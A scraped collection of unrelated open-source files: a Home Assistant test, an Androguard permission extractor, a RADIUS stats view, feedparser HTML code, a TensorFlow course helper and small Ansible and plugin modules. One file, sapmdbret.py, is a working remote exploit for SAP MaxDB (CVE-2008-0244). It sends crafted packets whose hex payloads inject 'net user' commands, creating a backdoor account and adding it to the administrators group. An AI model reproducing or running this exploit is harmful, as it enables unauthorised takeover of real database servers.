"homeassistant.components.ovo_energy.config_flow.OVOEnergy.authenticate",
side_effect=aiohttp.ClientError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
FIXTURE_USER_INPUT,
)
assert result2["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result2["step_id"] == "user"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_full_flow_implementation(hass: HomeAssistant) -> None:
"""Test registering an integration and finishing flow works."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
with patch(
"homeassistant.components.ovo_energy.config_flow.OVOEnergy.authenticate",
return_value=True,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
FIXTURE_USER_INPUT,
)
assert result2["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result2["data"][CONF_USERNAME] == FIXTURE_USER_INPUT[CONF_USERNAME]
assert result2["data"][CONF_PASSWORD] == FIXTURE_USER_INPUT[CONF_PASSWORD]
| apache-2.0 |
code4bones/androguard | tools/permissions/extract_api_permission_mappings.py | 14 | 9326 | #!/usr/bin/env python
# This file is part of Androguard.
#
# This is a tool to extract permissions and permission groups from Android Open Source Project.
# The information about the permissions and permission groups is appended to a file, which is
# later used in Androguard project.
#
# Author: Yury Zhauniarovich
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#CONSTANTS
PATH_TO_PSCOUT_FOLDER = "/home/yury/TMP/PScout/results/API_09"
API_VERSION = 9
MAPPINGS_MODULE_PATH = "../../androguard/core/api_specific_resources/api_permission_mappings/" #where to append the results
MAPPINGS_MODULE_NAME = "api_permission_mappings"
PSCOUT_METHOD_MAPPING_FILENAME = "allmappings"
PSCOUT_CONTENTPROVIDERFIELDS_MAPPING_FILENAME = "contentproviderfieldpermission"
METHODS_MAPPING_PARAM_NAME = "AOSP_PERMISSIONS_BY_METHODS"
FIELDS_MAPPING_PARAM_NAME = "AOSP_PERMISSIONS_BY_FIELDS"
#IMPORTS
import os, re, codecs
#auxiliary
TYPE_DESCRIPTOR = {
'V': 'void',
'Z': 'boolean',
'B': 'byte',
'S': 'short',
'C': 'char',
'I': 'int',
'J': 'long',
'F': 'float',
'D': 'double',
}
DESCRIPTOR_TYPE = {
'void' : 'V',
'boolean' : 'Z',
'byte' : 'B',
'short' : 'S',
'char' : 'C',
'int' : 'I',
'long' : 'J',
'float' : 'F',
'double' : 'D',
}
def countBrackets(atype):
res = re.findall('\[\s*\]', atype)
return len(res)
def transformClassParam(atype):
res = ""
arrDim = countBrackets(atype)
if arrDim > 0:
pos = atype.find('[')
atype = atype[0 : pos].strip()
res = '['*arrDim
if atype in DESCRIPTOR_TYPE:
res += DESCRIPTOR_TYPE[atype]
else:
res += FormatClassToJava(atype)
return res
def FormatClassToJava(input) :
"""
Transoform a typical xml format class into java format
:param input: the input class name
:rtype: string
"""
return "L" + input.replace(".", "/") + ";"
def parseMethod(methodString):
ms = methodString.strip()
mParamStartPos = ms.find('(')
mParamEndPos = ms.find(')')
paramString = ms[mParamStartPos + 1 : mParamEndPos].strip()
params = [l.strip() for l in paramString.split(',')]
retValue_mName = ms[0 : mParamStartPos].strip()
mNameStartPos = retValue_mName.rfind(' ')
returnValue = retValue_mName[0 : mNameStartPos].strip()
methodName = retValue_mName[mNameStartPos + 1 : ].strip()
return (methodName, params, returnValue)
#end of auxiliary
print "Starting conversion of PScout data: [%s]" % PATH_TO_PSCOUT_FOLDER
if not os.path.exists(MAPPINGS_MODULE_PATH):
os.makedirs(MAPPINGS_MODULE_PATH)
print "Checking if we already have the file with the version %d..." % API_VERSION
api_specific_mappings_module_name = "%s_api%s.py" % (MAPPINGS_MODULE_NAME, API_VERSION)
api_specific_mappings_module_path = os.path.join(MAPPINGS_MODULE_PATH, api_specific_mappings_module_name)
if os.path.exists(api_specific_mappings_module_path):
print "API specific file for this version already exists!"
print "If you want create a file for newer version, please, delete file: %s" % api_specific_mappings_module_path
exit(1)
print "Reading method mapping file..."
pscout_method_mapping_filepath = os.path.join(PATH_TO_PSCOUT_FOLDER, PSCOUT_METHOD_MAPPING_FILENAME)
methods_mapping_file_lines = []
with open(pscout_method_mapping_filepath, 'r') as pscout_file:
methods_mapping_file_lines = pscout_file.readlines()
print "Starting to parse file: [%s]" % pscout_method_mapping_filepath
perm_name = None
methods_mapping = {}
for line in methods_mapping_file_lines:
line = line.strip()
if line.startswith("Permission:"):
perm_name = line.split("Permission:")[1].strip()
print "PROCESSING PERMISSIONS: %s" % perm_name
elif line.startswith("<"):
class_method = line[line.find('<') + 1 : line.rfind('>')]
sepPos = class_method.find(':')
className = class_method[0 : sepPos].strip()
methodStr = class_method[sepPos + 1 :].strip()
methodName, params, returnValue = parseMethod(methodStr)
modParStr = ""
for par in params:
if par != "":
modParStr += transformClassParam(par) + ' '
modParStr = modParStr.strip()
method_identificator = "%s-%s-(%s)%s" % (transformClassParam(className), methodName, modParStr, transformClassParam(returnValue))
try:
methods_mapping[method_identificator].add(perm_name)
except KeyError:
methods_mapping[method_identificator] = set()
methods_mapping[method_identificator].add(perm_name)
print "Reading contentproviderfield mapping file..."
pscout_contentproviderfields_mapping_filepath = os.path.join(PATH_TO_PSCOUT_FOLDER, PSCOUT_CONTENTPROVIDERFIELDS_MAPPING_FILENAME)
contentproviderfields_mapping_file_lines = []
with open(pscout_contentproviderfields_mapping_filepath, 'r') as pscout_file:
contentproviderfields_mapping_file_lines = pscout_file.readlines()
perm_name = None
fields_mapping = {}
for line in contentproviderfields_mapping_file_lines:
line = line.strip()
if line.startswith("PERMISSION:"):
perm_name = line.split("PERMISSION:")[1].strip()
print "PROCESSING PERMISSIONS: %s" % perm_name
elif line.startswith("<"):
field_entry = line[line.find('<') + 1 : line.rfind('>')]
classNameSepPos = field_entry.find(':')
className = field_entry[0 : classNameSepPos].strip()
proto_name_str = field_entry[classNameSepPos + 1 :].strip()
proto_name_parts = proto_name_str.split()
proto = proto_name_parts[0].strip()
name = proto_name_parts[1].strip()
field_identificator = "%s-%s-%s" % (transformClassParam(className), name, transformClassParam(proto))
try:
fields_mapping[field_identificator].add(perm_name)
except KeyError:
fields_mapping[field_identificator] = set()
fields_mapping[field_identificator].add(perm_name)
print "Appending found information to the mappings file..."
with codecs.open(api_specific_mappings_module_path, 'w', 'utf-8') as perm_py_module:
perm_py_module.write('#!/usr/bin/python\n')
perm_py_module.write('# -*- coding: %s -*-\n\n' % 'utf-8')
perm_py_module.write('# This file is a part of Androguard.\n')
perm_py_module.write('#\n')
perm_py_module.write('# This file is generated automatically from the data\n')
perm_py_module.write('# provided by PScout tool [http://pscout.csl.toronto.edu/]\n')
perm_py_module.write('# using script: %s\n' % os.path.basename(__file__))
perm_py_module.write('#\n')
perm_py_module.write('# Author: Yury Zhauniarovich\n')
perm_py_module.write('#\n')
perm_py_module.write('#\n')
perm_py_module.write('# Licensed under the Apache License, Version 2.0 (the "License");\n')
perm_py_module.write('# you may not use this file except in compliance with the License.\n')
perm_py_module.write('# You may obtain a copy of the License at\n')
perm_py_module.write('#\n')
perm_py_module.write('# http://www.apache.org/licenses/LICENSE-2.0\n')
perm_py_module.write('#\n')
perm_py_module.write('# Unless required by applicable law or agreed to in writing, software\n')
perm_py_module.write('# distributed under the License is distributed on an "AS-IS" BASIS,\n')
perm_py_module.write('# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n')
perm_py_module.write('# See the License for the specific language governing permissions and\n')
perm_py_module.write('# limitations under the License"\n\n')
perm_py_module.write('#################################################\n')
perm_py_module.write('### API version: %d \n' % API_VERSION)
perm_py_module.write('#################################################\n\n\n')
perm_py_module.write("%s = {\n" % METHODS_MAPPING_PARAM_NAME)
for method in methods_mapping.keys():
permissions = methods_mapping.get(method)
perms_string = ", ".join(["'%s'" % prm for prm in permissions])
perm_py_module.write("\t'%s' : [%s],\n" % (method, perms_string))
perm_py_module.write("}\n\n")
perm_py_module.write("%s = {\n" % FIELDS_MAPPING_PARAM_NAME)
for field in fields_mapping.keys():
permissions = fields_mapping.get(field)
perms_string = ", ".join(["'%s'" % prm for prm in permissions])
perm_py_module.write("\t'%s' : [%s],\n" % (field, perms_string))
perm_py_module.write("}\n")
perm_py_module.write("#################################################\n")
print "Done..." | apache-2.0 |
davislidaqing/Mcoderadius | toughradius/console/admin/online_stat.py | 5 | 2448 | #!/usr/bin/env python
# coding:utf-8
from bottle import Bottle
from bottle import request
from bottle import response
from bottle import redirect
from bottle import static_file
from bottle import mako_template as render
from tablib import Dataset
from toughradius.console.websock import websock
from toughradius.console import models
from toughradius.console.libs import utils
from toughradius.console.base import *
from toughradius.console.admin import forms
import bottle
import datetime
from sqlalchemy import func
__prefix__ = "/online_stat"
app = Bottle()
app.config['__prefix__'] = __prefix__
###############################################################################
# ops log manage
###############################################################################
def default_start_end():
day_code = datetime.datetime.now().strftime("%Y-%m-%d")
begin = datetime.datetime.strptime("%s 00:00:00" % day_code, "%Y-%m-%d %H:%M:%S")
end = datetime.datetime.strptime("%s 23:59:59" % day_code, "%Y-%m-%d %H:%M:%S")
return time.mktime(begin.timetuple()), time.mktime(end.timetuple())
@app.get('/', apply=auth_opr)
def online_stat_query(db, render):
return render(
"stat_online",
node_list=get_opr_nodes(db),
node_id=None,
day_code=utils.get_currdate()
)
@app.route('/data', apply=auth_opr, method=['GET', 'POST'])
def online_stat_data(db, render):
node_id = request.params.get('node_id')
day_code = request.params.get('day_code')
opr_nodes = get_opr_nodes(db)
if not day_code:
day_code = utils.get_currdate()
begin = datetime.datetime.strptime("%s 00:00:00" % day_code, "%Y-%m-%d %H:%M:%S")
end = datetime.datetime.strptime("%s 23:59:59" % day_code, "%Y-%m-%d %H:%M:%S")
begin_time, end_time = time.mktime(begin.timetuple()), time.mktime(end.timetuple())
_query = db.query(models.SlcRadOnlineStat)
if node_id:
_query = _query.filter(models.SlcRadOnlineStat.node_id == node_id)
else:
_query = _query.filter(models.SlcRadOnlineStat.node_id.in_([i.id for i in opr_nodes]))
_query = _query.filter(
models.SlcRadOnlineStat.stat_time >= begin_time,
models.SlcRadOnlineStat.stat_time <= end_time,
)
_data = [(q.stat_time * 1000, q.total) for q in _query]
return dict(code=0, data=[{'data': _data}])
permit.add_route("/online_stat", u"在线用户统计", MenuStat, is_menu=True, order=1) | agpl-3.0 |
ltucker/giblets | giblets/policy.py | 1 | 3816 | import fnmatch
import re
from giblets.core import _component_id
__all__ = ['Blacklist', 'Whitelist', 'Patterns']
class Blacklist(object):
"""
policy that activates all Components that
have not been specifically disabled.
"""
def __init__(self):
self.blacklist = set()
def enable_component(self, component):
"""
Allow the component specified to be activated
for this ComponentManager.
component may be a full class name string 'foo.bar.Quux'
a Component type or an instance of a Component.
"""
try:
self.blacklist.remove(_component_id(component))
except KeyError:
pass
def disable_component(self, component):
"""
Do not allow the component specified to be activated
for this ComponentManager.
component may be a full class name string 'foo.bar.Quux'
a Component type or an instance of a Component.
"""
component_id = _component_id(component)
self.blacklist.add(component_id)
def is_component_enabled(self, component):
"""
returns True unless the component specified
has been disabled.
"""
if _component_id(component) in self.blacklist:
return False
return True
class Whitelist(object):
"""
Policy that activates only Components
that have been specifically enabled.
"""
def __init__(self):
self.whitelist = set()
def enable_component(self, component):
"""
Allow the component specified to be activated
for this ComponentManager.
component may be a full class name string 'foo.bar.Quux'
a Component type or an instance of a Component.
"""
self.whitelist.add(_component_id(component))
def disable_component(self, component):
"""
Do not allow the component specified to be activated
for this ComponentManager.
component may be a full class name string 'foo.bar.Quux'
a Component type or an instance of a Component.
"""
try:
self.whitelist.remove(_component_id(component))
except KeyError:
pass
def is_component_enabled(self, component):
"""
returns False unless the component specified has been
enabled.
"""
return _component_id(component) in self.whitelist
class Patterns(object):
"""
A policy which enables and disables components
based on an ordered list of wildcard patterns like foo.bar.*
etc. First match is taken.
"""
def __init__(self):
self.patterns = []
def build_pattern(self, pattern, enable):
"""
create an entry suitable for insertion into the
patterns list of this manager.
If pattern is a string, it is
treated as a wildcard patten like foo.bar.*
Otherwise, it is assumed pattern is a compiled
regular expression.
eg:
pat = mgr.build_pattern('foo.*', True)
mgr.patterns.insert(0, pat)
"""
if isinstance(pattern, basestring):
pattern = re.compile(fnmatch.translate(pattern))
return (pattern, enable)
def append_pattern(self, pattern, enable):
"""
helper to add a pattern to the end of the
list of patterns.
"""
pat = self.build_pattern(pattern, enable)
self.patterns.append(pat)
def is_component_enabled(self, component):
enabled = False
comp_id = _component_id(component)
for (pat, state) in self.patterns:
if pat.match(comp_id) is not None:
enabled = state
break
return enabled
| bsd-3-clause |
fernandog/Medusa | ext/feedparser/html.py | 43 | 7922 | from __future__ import absolute_import, unicode_literals
import re
try:
from html.entities import name2codepoint
except ImportError:
from htmlentitydefs import name2codepoint
from .sgml import *
_cp1252 = {
128: '\u20ac', # euro sign
130: '\u201a', # single low-9 quotation mark
131: '\u0192', # latin small letter f with hook
132: '\u201e', # double low-9 quotation mark
133: '\u2026', # horizontal ellipsis
134: '\u2020', # dagger
135: '\u2021', # double dagger
136: '\u02c6', # modifier letter circumflex accent
137: '\u2030', # per mille sign
138: '\u0160', # latin capital letter s with caron
139: '\u2039', # single left-pointing angle quotation mark
140: '\u0152', # latin capital ligature oe
142: '\u017d', # latin capital letter z with caron
145: '\u2018', # left single quotation mark
146: '\u2019', # right single quotation mark
147: '\u201c', # left double quotation mark
148: '\u201d', # right double quotation mark
149: '\u2022', # bullet
150: '\u2013', # en dash
151: '\u2014', # em dash
152: '\u02dc', # small tilde
153: '\u2122', # trade mark sign
154: '\u0161', # latin small letter s with caron
155: '\u203a', # single right-pointing angle quotation mark
156: '\u0153', # latin small ligature oe
158: '\u017e', # latin small letter z with caron
159: '\u0178', # latin capital letter y with diaeresis
}
class _BaseHTMLProcessor(sgmllib.SGMLParser, object):
special = re.compile('''[<>'"]''')
bare_ampersand = re.compile("&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)")
elements_no_end_tag = set([
'area', 'base', 'basefont', 'br', 'col', 'command', 'embed', 'frame',
'hr', 'img', 'input', 'isindex', 'keygen', 'link', 'meta', 'param',
'source', 'track', 'wbr'
])
def __init__(self, encoding=None, _type='application/xhtml+xml'):
if encoding:
self.encoding = encoding
self._type = _type
super(_BaseHTMLProcessor, self).__init__()
def reset(self):
self.pieces = []
sgmllib.SGMLParser.reset(self)
def _shorttag_replace(self, match):
tag = match.group(1)
if tag in self.elements_no_end_tag:
return '<' + tag + ' />'
else:
return '<' + tag + '></' + tag + '>'
# By declaring these methods and overriding their compiled code
# with the code from sgmllib, the original code will execute in
# feedparser's scope instead of sgmllib's. This means that the
# `tagfind` and `charref` regular expressions will be found as
# they're declared above, not as they're declared in sgmllib.
def goahead(self, i):
pass
try:
goahead.__code__ = sgmllib.SGMLParser.goahead.__code__
except AttributeError:
goahead.func_code = sgmllib.SGMLParser.goahead.func_code
def __parse_starttag(self, i):
pass
try:
__parse_starttag.__code__ = sgmllib.SGMLParser.parse_starttag.__code__
except AttributeError:
__parse_starttag.func_code = sgmllib.SGMLParser.parse_starttag.func_code
def parse_starttag(self,i):
j = self.__parse_starttag(i)
if self._type == 'application/xhtml+xml':
if j>2 and self.rawdata[j-2:j]=='/>':
self.unknown_endtag(self.lasttag)
return j
def feed(self, data):
data = re.compile(r'<!((?!DOCTYPE|--|\[))', re.IGNORECASE).sub(r'<!\1', data)
data = re.sub(r'<([^<>\s]+?)\s*/>', self._shorttag_replace, data)
data = data.replace(''', "'")
data = data.replace('"', '"')
sgmllib.SGMLParser.feed(self, data)
sgmllib.SGMLParser.close(self)
def normalize_attrs(self, attrs):
if not attrs:
return attrs
# utility method to be called by descendants
attrs = dict([(k.lower(), v) for k, v in attrs]).items()
attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in attrs]
attrs.sort()
return attrs
def unknown_starttag(self, tag, attrs):
# called for each start tag
# attrs is a list of (attr, value) tuples
# e.g. for <pre class='screen'>, tag='pre', attrs=[('class', 'screen')]
uattrs = []
strattrs=''
if attrs:
for key, value in attrs:
value=value.replace('>','>').replace('<','<').replace('"','"')
value = self.bare_ampersand.sub("&", value)
uattrs.append((key, value))
strattrs = ''.join([' %s="%s"' % (key, value) for key, value in uattrs])
if tag in self.elements_no_end_tag:
self.pieces.append('<%s%s />' % (tag, strattrs))
else:
self.pieces.append('<%s%s>' % (tag, strattrs))
def unknown_endtag(self, tag):
# called for each end tag, e.g. for </pre>, tag will be 'pre'
# Reconstruct the original end tag.
if tag not in self.elements_no_end_tag:
self.pieces.append("</%s>" % tag)
def handle_charref(self, ref):
# called for each character reference, e.g. for ' ', ref will be '160'
# Reconstruct the original character reference.
ref = ref.lower()
if ref.startswith('x'):
value = int(ref[1:], 16)
else:
value = int(ref)
if value in _cp1252:
self.pieces.append('&#%s;' % hex(ord(_cp1252[value]))[1:])
else:
self.pieces.append('&#%s;' % ref)
def handle_entityref(self, ref):
# called for each entity reference, e.g. for '©', ref will be 'copy'
# Reconstruct the original entity reference.
if ref in name2codepoint or ref == 'apos':
self.pieces.append('&%s;' % ref)
else:
self.pieces.append('&%s' % ref)
def handle_data(self, text):
# called for each block of plain text, i.e. outside of any tag and
# not containing any character or entity references
# Store the original text verbatim.
self.pieces.append(text)
def handle_comment(self, text):
# called for each HTML comment, e.g. <!-- insert Javascript code here -->
# Reconstruct the original comment.
self.pieces.append('<!--%s-->' % text)
def handle_pi(self, text):
# called for each processing instruction, e.g. <?instruction>
# Reconstruct original processing instruction.
self.pieces.append('<?%s>' % text)
def handle_decl(self, text):
# called for the DOCTYPE, if present, e.g.
# <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
# "http://www.w3.org/TR/html4/loose.dtd">
# Reconstruct original DOCTYPE
self.pieces.append('<!%s>' % text)
_new_declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9:]*\s*').match
def _scan_name(self, i, declstartpos):
rawdata = self.rawdata
n = len(rawdata)
if i == n:
return None, -1
m = self._new_declname_match(rawdata, i)
if m:
s = m.group()
name = s.strip()
if (i + len(s)) == n:
return None, -1 # end of buffer
return name.lower(), m.end()
else:
self.handle_data(rawdata)
# self.updatepos(declstartpos, i)
return None, -1
def convert_charref(self, name):
return '&#%s;' % name
def convert_entityref(self, name):
return '&%s;' % name
def output(self):
'''Return processed HTML as a single string'''
return ''.join(self.pieces)
def parse_declaration(self, i):
try:
return sgmllib.SGMLParser.parse_declaration(self, i)
except sgmllib.SGMLParseError:
# escape the doctype declaration and continue parsing
self.handle_data('<')
return i+1
| gpl-3.0 |
gregkcarson/sapmdbret | sapmdbret.py | 1 | 6385 | import sys
import socket
import random
import getopt
from optparse import OptionParser
from scapy.all import *
import os
import signal
from time import sleep, ctime
def main():
print " ^^ just ignore that :) "
print
print "***************************************************************************"
print "* SAPMDBRET - SAP MaxDB Remote Exploit Tool - v1 gregkcarson@gmail.com *"
print "---------------------------------------------------------------------------"
print " 'I thought what I'd do was, I'd pretend I was one of those deaf-mutes.' "
print "---------------------------------------------------------------------------"
print " Tool to use in attacking CVE 2008-0244 SAP MaxDB cons.exe RCE. "
print " For legit pen test and research use only. Although this program works, it"
print " it is still just a PoC and thus some convenient features are missing. "
print " This vulnerability is old but I still see it in a fair number of projects."
print " Thanks to Luigi Auriemma for the assistance."
print
usage = "usage: %prog [options] arg"
parser = OptionParser(usage, version="Welcome to %prog, gregkcarson@gmail.com for questions v1.0")
parser.add_option("-v","--verbose",action="store_true",dest="verbose", help="LOUD NOISES")
parser.add_option("-q","--quiet", action="store_false",dest="verbose", help="shhhhhhh")
parser.add_option("-i","--ip",type="string",dest="victim",help="Specify the victim IP")
parser.add_option("-p","--port",type="int",dest="port",help="Specify the target port we will connect to. If you are running ntpamp then it will override and default to 123.")
options,args=parser.parse_args()
if options.victim is not None:
global victim
victim = options.victim
else:
print "Review usage. See help."
if options.port is not None:
global port
port = options.port
else:
print "Using default port."
port=7210
print "[*]-Port set to: "+str(port)
print "[*]-Victim set to: "+victim
print "... Validating connection to target ..."
print "Attempting to connect to target on %s:%s" % (victim, port)
s = socket.socket()
s.settimeout(2)
try:
s.connect((victim,port))
print
print "Connected successfully to %s on port %s" % (victim, port)
print
s.close()
except socket.error, e:
print
print "Connection failed to %s on port %s failed. Reason: %s" % (victim,port,e)
sys.exit(0)
except KeyboardInterrupt:
print
print "User interrupted connection. Quitting."
sys.exit(0)
print "... Starting Attack Sequence ..."
print
#Scapy uses raw sockets which will confuse the Linux Kernel. SET THE PROPER VALUES
os.system('iptables -A OUTPUT -p tcp -d ATTACKERIP -s VICTIMIP --dport 7210 --tcp-flags RST RST -j DROP')
#Beginning of Attack Sequence
#Change your source IP appropriately
#Establish 3-WHS
ipsection=IP(src="10.0.17.82",dst=victim)
tcpsection=TCP(sport=random.randint(45000,65535),dport=port,flags="S", seq=12345)
zeropacket=ipsection/tcpsection
synack=sr1(zeropacket)
gcack=synack.seq+1
gcackport=synack.dport
print "Following Source Port Was Assigned: "+str(gcackport)
print
ack=TCP(sport=gcackport,dport=port,flags="A",seq=12346,ack=gcack)
send(ipsection/ack)
print "Three Way Handshake Established!"
print
#Protocol Establish Communications
PUSH=TCP(sport=gcackport,dport=port,flags="PA",seq=12346,ack=gcack)
payload1 = (
"\x57\x00\x00\x00\x03\x5b\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff"
"\x00\x00\x04\x00\x57\x00\x00\x00\x00\x02\x3f\x00\x04\x09\x00\x00"
"\x00\x40\x00\x00\xd0\x3f\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
"\x00\xc5\x09\x00\xc8\xf6\x08\x00\x00\xe3\x0a\x00\xd4\x00\x00\x00"
"\x07\x49\x31\x30\x31\x36\x00\x04\x50\x1c\x2a\x03\x52\x01\x09\x70"
"\x64\x62\x6d\x73\x72\x76\x00")
firstattack=ipsection/PUSH/Raw(load=payload1)
firstreply=sr1(firstattack)
gcack2=firstreply.ack
ack2=TCP(sport=gcackport,dport=port,flags="A",window=64153,seq=gcack2,ack=firstreply.seq+87)
send(ipsection/ack2)
print "Server Version successfully probed - ACK reply sent - proceeding to commend execution"
print
#net user gregthg 1THGsecret! /ADD <-- If you want a different username and password change the hex accordingly, keep the byte length teh same.
print "...Trying to create user..."
PUSH2=TCP(sport=gcackport,dport=port,flags="PA",seq=gcack2,ack=firstreply.seq+87) #\x2d\x68\x20
payload2 = (
"\x4a\x00\x00\x00\x03\x3f\x00\x00\x01\x00\x00\x00\x54\x0d\x00\x00"
"\x00\x00\x04\x00\x4a\x00\x00\x00\x65\x78\x65\x63\x5f\x73\x64\x62"
"\x69\x6e\x66\x6f\x20\x26\x26\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x67\x72\x65\x67\x74\x68\x67\x20\x31\x54\x48\x47\x73\x65\x63"
"\x72\x65\x74\x21\x20\x2f\x41\x44\x44\x00")
secondattack=ipsection/PUSH2/Raw(load=payload2)
secondreply=sr1(secondattack)
#UNCOMMENT TO EXECUTE THE FOLLOWING COMMAND ON THE TARGET net localgroup administrators gregthg /ADD
print "...Trying to join user to local administrators group..."
print
gcack3=secondreply.ack
PUSH3=TCP(sport=gcackport,dport=port,flags="PA",seq=gcack3,ack=secondreply.seq+74)
payload3 = (
"\x53\x00\x00\x00\x03\x3f\x00\x00\x01\x00\x00\x00\x54\x0d\x00\x00"
"\x00\x00\x04\x00\x53\x00\x00\x00\x65\x78\x65\x63\x5f\x73\x64\x62"
"\x69\x6e\x66\x6f\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61"
"\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72"
"\x61\x74\x6f\x72\x73\x20\x67\x72\x65\x67\x74\x68\x67\x20\x2f\x41"
"\x44\x44\x00")
thirdattack=ipsection/PUSH3/Raw(load=payload3)
thirdreply=sr1(thirdattack)
#You should now be able to log in via RDP or connect over SMB to the target
print "Attack Sequence Completed - Exiting Program!"
#SET THE PROPER VALUES
os.system('iptables -D OUTPUT -p tcp -d ATTACKERIP -s VICTIMIP --dport 7210 --tcp-flags RST RST -j DROP')
if __name__=='__main__':
main()
| gpl-2.0 |
jinzishuai/learn2deeplearn | deeplearning.ai/C2.ImproveDeepNN/week3/tensorflow_assignment/tf_utils.py | 5 | 4710 | import h5py
import numpy as np
import tensorflow as tf
import math
def load_dataset():
train_dataset = h5py.File('datasets/train_signs.h5', "r")
train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features
train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels
test_dataset = h5py.File('datasets/test_signs.h5', "r")
test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features
test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels
classes = np.array(test_dataset["list_classes"][:]) # the list of classes
train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))
return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
def random_mini_batches(X, Y, mini_batch_size = 64, seed = 0):
"""
Creates a list of random minibatches from (X, Y)
Arguments:
X -- input data, of shape (input size, number of examples)
Y -- true "label" vector (containing 0 if cat, 1 if non-cat), of shape (1, number of examples)
mini_batch_size - size of the mini-batches, integer
seed -- this is only for the purpose of grading, so that you're "random minibatches are the same as ours.
Returns:
mini_batches -- list of synchronous (mini_batch_X, mini_batch_Y)
"""
m = X.shape[1] # number of training examples
mini_batches = []
np.random.seed(seed)
# Step 1: Shuffle (X, Y)
permutation = list(np.random.permutation(m))
shuffled_X = X[:, permutation]
shuffled_Y = Y[:, permutation].reshape((Y.shape[0],m))
# Step 2: Partition (shuffled_X, shuffled_Y). Minus the end case.
num_complete_minibatches = math.floor(m/mini_batch_size) # number of mini batches of size mini_batch_size in your partitionning
for k in range(0, num_complete_minibatches):
mini_batch_X = shuffled_X[:, k * mini_batch_size : k * mini_batch_size + mini_batch_size]
mini_batch_Y = shuffled_Y[:, k * mini_batch_size : k * mini_batch_size + mini_batch_size]
mini_batch = (mini_batch_X, mini_batch_Y)
mini_batches.append(mini_batch)
# Handling the end case (last mini-batch < mini_batch_size)
if m % mini_batch_size != 0:
mini_batch_X = shuffled_X[:, num_complete_minibatches * mini_batch_size : m]
mini_batch_Y = shuffled_Y[:, num_complete_minibatches * mini_batch_size : m]
mini_batch = (mini_batch_X, mini_batch_Y)
mini_batches.append(mini_batch)
return mini_batches
def convert_to_one_hot(Y, C):
Y = np.eye(C)[Y.reshape(-1)].T
return Y
def predict(X, parameters):
W1 = tf.convert_to_tensor(parameters["W1"])
b1 = tf.convert_to_tensor(parameters["b1"])
W2 = tf.convert_to_tensor(parameters["W2"])
b2 = tf.convert_to_tensor(parameters["b2"])
W3 = tf.convert_to_tensor(parameters["W3"])
b3 = tf.convert_to_tensor(parameters["b3"])
params = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2,
"W3": W3,
"b3": b3}
x = tf.placeholder("float", [12288, 1])
z3 = forward_propagation_for_predict(x, params)
p = tf.argmax(z3)
sess = tf.Session()
prediction = sess.run(p, feed_dict = {x: X})
return prediction
def forward_propagation_for_predict(X, parameters):
"""
Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX
Arguments:
X -- input dataset placeholder, of shape (input size, number of examples)
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3"
the shapes are given in initialize_parameters
Returns:
Z3 -- the output of the last LINEAR unit
"""
# Retrieve the parameters from the dictionary "parameters"
W1 = parameters['W1']
b1 = parameters['b1']
W2 = parameters['W2']
b2 = parameters['b2']
W3 = parameters['W3']
b3 = parameters['b3']
# Numpy Equivalents:
Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1
A1 = tf.nn.relu(Z1) # A1 = relu(Z1)
Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, a1) + b2
A2 = tf.nn.relu(Z2) # A2 = relu(Z2)
Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3,Z2) + b3
return Z3
| gpl-3.0 |
roadmapper/ansible | test/integration/targets/want_json_modules_posix/library/helloworld.py | 62 | 1047 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# WANT_JSON
import json
import sys
try:
with open(sys.argv[1], 'r') as f:
data = json.load(f)
except (IOError, OSError, IndexError):
print(json.dumps(dict(msg="No argument file provided", failed=True)))
sys.exit(1)
salutation = data.get('salutation', 'Hello')
name = data.get('name', 'World')
print(json.dumps(dict(msg='%s, %s!' % (salutation, name))))
| gpl-3.0 |
servo-highfive/highfive | highfive/event_handlers/pull_request/path_watcher_notifier/__init__.py | 2 | 1385 | from ... import EventHandler
import re
